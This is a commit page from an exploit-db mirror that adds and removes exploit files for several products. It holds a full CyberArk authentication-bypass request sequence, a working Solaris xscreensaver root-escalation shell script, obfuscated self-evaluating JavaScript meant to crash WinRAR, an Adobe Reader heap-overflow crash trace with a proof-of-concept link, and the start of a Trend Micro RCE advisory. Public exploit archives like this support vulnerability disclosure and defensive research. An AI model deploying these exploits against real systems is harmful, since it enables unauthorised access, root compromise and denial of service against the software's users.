bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-10-22

Browse source 
7 changes to exploits/shellcodes

winrar 5.80 64bit - Denial of Service
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)

sudo 1.2.27 - Security Bypass
sudo 1.8.27 - Security Bypass
winrar 5.80 - XML External Entity Injection
Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution
Solaris 11.4 - xscreensaver Privilege Escalation

CyberArk Password Vault 10.6 - Authentication Bypass
This commit is contained in:
Offensive Security 2019-10-22 05:01:40 +00:00
parent 9601f70535
commit e4e566f5ff
7 changed files with 482 additions and 82 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

80
exploits/linux/webapps/47512.txt
View file

@ -1,80 +0,0 @@
# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass
# Date: 2019-10-16
# Author: Daniel Martinez Adan (adon90)
# Vendor: https://www.cyberark.com
# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Collaborator: Luis Buendía (exoticpayloads)
# Version Affected: All
# It is possible to retrieve a valid cookie by injecting special characters
# in the username field:
vulnerable parameter:
pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername
URL:
/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Payload:
%1F
# Requirements:
# Using a valid ViewState -> if it doesn't work, go to the login panel to
# automatically generate a valid ViewState
# Once the valid cookie is obtained, it is posible to perform multiple
# actions in the PasswordVault such us:
# - Retrieving valid user information (Name, Email, Phone number….)
# - DoS
# - DNS enumeration via ip address
# - Possibly deleting users
# Login Bypass:
POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 2435
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca
Upgrade-Insecure-Requests: 1
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd=
# User Information:
POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 28
{"userName":"administrator"}
# Resolve DNS / DoS
GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CAAjax: adon90
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1

168
exploits/solaris/local/47529.txt Normal file
View file

@ -0,0 +1,168 @@
@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)
Title: Local privilege escalation on Solaris 11.x via xscreensaver
Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
Other versions starting from 5.06 are potentially affected
Platforms: Oracle Solaris 11.x (tested on 11.4 and 11.3)
Other platforms are potentially affected (see below)
Description: A local attacker can gain root privileges by exploiting a
design error vulnerability in the xscreensaver distributed with
Solaris
Author: Marco Ivaldi <marco.ivaldi@mediaservice.net>
Vendor Status: <secalert_us@oracle.com> notified on 2019-07-09
CVE Name: CVE-2019-3010
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://www.jwz.org/xscreensaver/
https://www.oracle.com/technetwork/server-storage/solaris11/
https://www.mediaservice.net/
https://0xdeadbeef.info/
1. Abstract.
Exploitation of a design error vulnerability in xscreensaver, as distributed
with Solaris 11.x, allows local attackers to create (or append to) arbitrary
files on the system, by abusing the -log command line switch introduced in
version 5.06. This flaw can be leveraged to cause a denial of service condition
or to escalate privileges to root.
2. Example Attack Session.
raptor@stalker:~$ cat /etc/release
Oracle Solaris 11.4 X86
Copyright (c) 1983, 2018, Oracle and/or its affiliates. All rights reserved.
Assembled 16 August 2018
raptor@stalker:~$ uname -a
SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
raptor@stalker:~$ id
uid=100(raptor) gid=10(staff)
raptor@stalker:~$ chmod +x raptor_xscreensaver
raptor@stalker:~$ ./raptor_xscreensaver
raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
[...]
Oracle Corporation SunOS 5.11 11.4 Aug 2018
root@stalker:~# id
uid=0(root) gid=0(root)
3. Affected Platforms.
This vulnerability was confirmed on the following platforms:
* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
* Oracle Solaris 11.x SPARC [untested]
Previous Oracle Solaris 11 versions might also be vulnerable.
Based on our analysis and on feedback kindly provided by Alan Coopersmith of
Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
the fact that Oracle maintains a slightly different codebase from the upstream
one. Alan explained this as follows:
"The problem in question here appears to be inherited from the long-ago fork
[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
unlock dialog with accessibility support to replace the non-accessible Xlib
unlock dialog that upstream provides, which moves the uid reset to after where
the log file opening was later added."
Specifically, the problem arises because of this bit of Solaris patches:
https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770
As an interesting side note, it appears Red Hat dropped this code back in 2002
with version 4.05-5:
https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179
4. Fix.
Oracle has assigned the tracking# S1182608 and has released a fix for all
affected and supported versions of Solaris in their Critical Patch Update (CPU)
of October 2019.
As a temporary workaround, it is also possible to remove the setuid bit from
the xscreensaver executable as follows (note that this might prevent it from
working properly):
bash-3.2# chmod -s /usr/bin/xscreensaver
5. Proof of Concept.
An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
can be downloaded from:
https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver
#!/bin/sh
#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Exploitation of a design error vulnerability in xscreensaver, as
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation SunOS 5.11 11.4 Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#
echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
# prepare the payload
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi
# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi
# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &
# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5
# clean up
pkill -n xscreensaver
pkill -n Xorg
# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -

73
exploits/windows/dos/47525.txt Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: winrar 5.80 64bit - Denial of Service
# Date: 2019-10-19
# Exploit Author: alblalawi
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
# 1- open winrar or any file.rar
# 2- help
# 3- help topics
# 4- Drag the exploit to the window
# Save the content html
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
"\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
"e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+
"\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" +
"83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+
"\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+
"\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" +
"5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" +
"\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" +
"F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" +
"\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+
"\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" +
"\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" +
",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+
"\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" +
"\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" +
"3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+
"RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+
"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+
"\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" +
"\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+
"\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+
"\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." +
"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+
")" ;
while(x=eval(x));
//-->
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+
"\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" +
"\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
"30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" +
"\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" +
"0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" +
"\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" +
"J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" +
"\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" +
"f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" +
"AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" +
"30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" +
"C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" +
"\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")" ;
while(x=eval(x));
//-->
//]]>
</script>

85
exploits/windows/dos/47528.txt Normal file
View file

@ -0,0 +1,85 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(7f2c.8be8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000080 ebx=00001b52 ecx=00000080 edx=00000080 esi=00000001 edi=6f587000
eip=6a005324 esp=050fbc14 ebp=050fbc34 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
JP2KLib!IJP2KException::GetErrString+0x3224:
6a005324 8817 mov byte ptr [edi],dl ds:002b:6f587000=??
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 050fbc34 6a0030e8 00001b52 00001b53 00000000 JP2KLib!IJP2KException::GetErrString+0x3224
01 050fbcb0 69ff3bf0 0000000a 000002ce 00000001 JP2KLib!IJP2KException::GetErrString+0xfe8
02 050fbd44 69ff4132 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe9d0
03 050fbda0 69ff43f9 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xef12
04 050fbdc8 69ff37bc 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xf1d9
05 050fbe7c 69ff31eb 050fbf88 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe59c
06 050fbebc 6a005d8a 0000000d 00000008 000000ff JP2KLib!JP2KCopyRect+0xdfcb
07 050fbf1c 5f721b53 62c74e88 0000000d 00000008 JP2KLib!JP2KImageDecodeImageRegion+0x2a
08 050fbf9c 5f71544b 6ad22fac 050fbfcc 5f115889 AcroRd32!AX_PDXlateToHostEx+0x343e93
09 050fbfa8 5f115889 6ad22fac 62c7cfb0 5f1157f0 AcroRd32!AX_PDXlateToHostEx+0x33778b
0a 050fbfcc 5f115783 6ad0efe0 00000001 0000001b AcroRd32!DllCanUnloadNow+0x4c929
0b 050fbfec 5f561d7a 050fc010 6ad0efe0 0000001b AcroRd32!DllCanUnloadNow+0x4c823
0c 050fc030 5f24afc8 c0020000 00000004 6ad0efe0 AcroRd32!AX_PDXlateToHostEx+0x1840ba
0d 050fc384 5f24a506 050fc3e0 53406a98 95e3efd6 AcroRd32!DllCanUnloadNow+0x182068
0e 050fc3bc 5f24a3e1 050fc3e0 53406a98 050fc44c AcroRd32!DllCanUnloadNow+0x1815a6
0f 050fc428 5f2493a8 c0020000 00000004 53406a98 AcroRd32!DllCanUnloadNow+0x181481
10 050fc888 5f2468f7 050fcb8c 686e45ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
11 050fe068 5f246575 686e45ac c0020000 00000004 AcroRd32!DllCanUnloadNow+0x17d997
12 050fe138 5f22a25c 95e3ce72 5d91af78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
13 050fe218 5f229057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
14 050fe264 5f21c183 5d91af78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
15 050fe3d8 5f21ba97 553e6dbc 00000001 6a169ef8 AcroRd32!DllCanUnloadNow+0x153223
16 050fe440 5f219281 95e3c8aa 5323efc8 5adccea8 AcroRd32!DllCanUnloadNow+0x152b37
17 050fe4c0 5f218dae 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x150321
18 050fe4fc 5f218d07 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x14fe4e
19 050fe584 5f2182ee 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14fda7
1a 050fe5c0 5f216f02 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14f38e
1b 050fe884 5f215d98 6a169ef8 050fe918 050fe968 AcroRd32!DllCanUnloadNow+0x14dfa2
1c 050fe988 5f2143b8 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
1d 050fe9ec 5f21414d 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b458
1e 050fea0c 5f212d3c 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
1f 050feac4 5f212762 00000001 00000000 95e3c776 AcroRd32!DllCanUnloadNow+0x149ddc
20 050feb1c 5f21257a 7d8b4ef0 00000001 95e3c7ea AcroRd32!DllCanUnloadNow+0x149802
21 050feb80 5f2122ff 050fec74 95e3c0fe 80882fa0 AcroRd32!DllCanUnloadNow+0x14961a
22 050fec94 5f0d687c 80882fa0 5f0d67a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
23 050fecac 5f0d678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
24 050fecc8 745de0bb 00180a60 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
25 050fecf4 745e8849 5f0d66d0 00180a60 0000000f USER32!_InternalCallWinProc+0x2b
26 050fed18 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
27 050fede8 745d8503 5f0d66d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
28 050fee50 745d8aa0 147683c0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
29 050fee98 77371a6d 050feeb4 00000020 050fef14 USER32!__fnDWORD+0x50
2a 050feed0 745d91ee 050fef64 5a5cb65c 18836dd8 ntdll!KiUserCallbackDispatcher+0x4d
2b 050fef24 745d8c20 5f535978 050fef48 5f0eda6d USER32!DispatchMessageWorker+0x5be
2c 050fef30 5f0eda6d 050fef64 18836dd8 18836dd8 USER32!DispatchMessageW+0x10
2d 050fef48 5f0ed89e 050fef64 95e3c3d6 18836dd8 AcroRd32!DllCanUnloadNow+0x24b0d
2e 050fefbc 5f0ed744 95e3c39e 18836dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
2f 050feff4 5f07c575 95e3dc0e 17484ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
30 050ff064 5f07bf81 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x775
31 050ff484 0011783d 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x181
32 050ff850 002201aa 00110000 00000000 0bd5b3f2 AcroRd32_exe+0x783d
33 050ff89c 76698674 04f5f000 76698650 c83dc0c6 AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
34 050ff8b0 77365e17 04f5f000 07a6f6f5 00000000 KERNEL32!BaseThreadInitThunk+0x24
35 050ff8f8 77365de7 ffffffff 7738ad9e 00000000 ntdll!__RtlUserThreadStart+0x2f
36 050ff908 00000000 00111390 04f5f000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled.
- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to 5 bytes inside of a binary JP2 image stream: 4 bytes at offset 0x195 changed from <FF FF E0 00> to <00 00 00 C0>, and 1 byte at offset 0x1ED changed from <0x53> to <0x5B>.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47528.zip

112
exploits/windows/local/47527.txt Normal file
View file

@ -0,0 +1,112 @@
# Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution
# Date: 2019-10-19
# Exploit Author: hyp3rlinx
# Vendor Homepage: www.trendmicro.com
# Version: 1.62.0.1218 and below
# Tested on: Microsoft Windows
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security
[Vendor]
www.trendmicro.com
[Product]
Trend Micro Anti-Threat Toolkit (ATTK)
1.62.0.1218 and below
